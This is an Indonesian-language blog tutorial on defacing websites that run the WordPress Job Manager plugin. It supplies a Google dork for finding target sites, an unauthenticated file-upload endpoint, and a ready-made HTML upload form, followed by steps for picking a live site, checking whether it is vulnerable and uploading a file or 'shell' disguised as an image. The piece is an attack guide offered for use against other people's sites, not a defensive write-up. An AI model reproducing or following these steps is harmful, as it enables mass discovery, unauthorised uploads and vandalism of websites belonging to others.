Deface WordPress plugin job manager

Selamat sore kawan, kali ini saya akan memberikan tutorial deface wordpress plugin job manager
oke langsung saja

bahan bahan yang di butuhkan

      1. Dork 

inurl:/wp-content/uploads/job-manager-uploads/

      2. Exploit

http://target.com /jm-ajax/upload_file

       3. Csrf

<html>
<form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data">
<input type="file" name="file"> <input type="submit" value="upload">
</form>
</html>     

untuk csrf ini kalian copy dan pastekan lewat notepad,sublime,notepad ++ atau yang lain dan simpan dengan extensi .html contoh csrf.html 


Langkah-langkah

1. Pertama dorking dulu di google menggunakan dork di atas tadi
2. silahkan pilih salah satu target kalian
3. setelah itu masukan exploit nya di belakang url target contoh http://afikganteng.com/jm-ajax/upload_file 
4. Jika vuln tandanya seperti gambar di bawah ini
   
   
   
5. selanjutnya masukkan target ke csrf, pada bagian <form method="post" action="http://target.com/jm-ajax/upload_file/" enctype="multipart/form-data">  target.com ganti dengan url target kalian misal http://afikganteng.com
6. simpan lagi csrf nya dengan menekan tombol ctrl + s kemudian buka csrf nya menggunakan web browser 
7. selanjutnya pilih choose file, silahkan upload file atau shell kalian tapi ingat di sini extensi nya harus .jpg .gif atau .png, jika sudah klik upload
8. jika berhasil muncul tampilan seperti di bawah ini

      9. Oke kalo mau lihat file yang sudah kita upload tadi tinggal ketik di belakang url 

/wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpg

        contoh http://afikganteng /wp-content/uploads/job-manager-uploads/file/2018/01/uhu-1.jpg


oke itulah tutorial sederhana dari saya, itu untuk yang menggunakan csrf ya untuk yang menggunakan tool silahkan kalian mampir di www.indoxploit.or.id sekian see you next tutorial

thx indoXploit

kalo kalian bingung bisa lihat video di bawah ini